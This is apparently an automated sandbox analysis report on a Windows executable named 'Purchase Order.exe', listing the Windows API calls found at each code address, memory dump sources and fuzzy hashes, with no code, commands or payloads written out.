                                                          • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                          • Opcode Fuzzy Hash: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                          • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                          APIs
                                                          • ShowWindow.USER32(00010452), ref: 00401579
                                                          • ShowWindow.USER32(0001044C), ref: 0040158E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                          • Instruction ID: b54bb08643918bb8896a5862ce8d2e5c56cc7996104e834ef2f2724ba304e424
                                                          • Opcode Fuzzy Hash: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                          • Instruction Fuzzy Hash: A5E0E57BB182405FEB21DB64AD9086D7BA29B95310795017BD101A7591C2789C09C728
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                            • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                            • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                            • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                          • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                          • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                          • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059A6
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                          • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                          • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                          • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                          • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                          • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                          • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                          • GetLastError.KERNEL32 ref: 0040549F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                          • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                          • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                          • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                          APIs
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 0040167D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: fc9ffe6ed8b48b677133cb54e85f07391461bf8d88784c8962aa294f1e3cd555
                                                          • Instruction ID: 213e299c3c991b1d5f85066edd92eb9da76011fda99402bbbffec67db0907874
                                                          • Opcode Fuzzy Hash: fc9ffe6ed8b48b677133cb54e85f07391461bf8d88784c8962aa294f1e3cd555
                                                          • Instruction Fuzzy Hash: 5BF02431E08120ABDB20BB768E0DE4F2168AB61369B34473BB102B21D1DABC8402557F
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                          • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                          • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                          • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                          APIs
                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: PathSearch
                                                          • String ID:
                                                          • API String ID: 2203818243-0
                                                          • Opcode ID: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                          • Instruction ID: c7ce876e5ad96af4d980a0e505f4bdb0f2e6b31a9f033159e1f135e3aabe3218
                                                          • Opcode Fuzzy Hash: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                          • Instruction Fuzzy Hash: 3DE0D872204100ABE300DB549D48FAA3758DB10368F304537F201A60C1D2B499459639
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                          • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                          • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                          • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                          • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                          • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                          • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                          • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                          • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                          • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                          APIs
                                                          • SendMessageA.USER32(00010446,00000000,00000000,00000000), ref: 00403F72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                          • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                          • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                          • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                          APIs
                                                          • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                          • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                          • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                          • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                          • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                          • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                          • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                          • Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
                                                          • Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                          • Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                          • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                          • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                          • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                          • DeleteObject.GDI32(00000000), ref: 004049BB
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                          • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                          • GlobalFree.KERNEL32(00000000), ref: 00404CF4
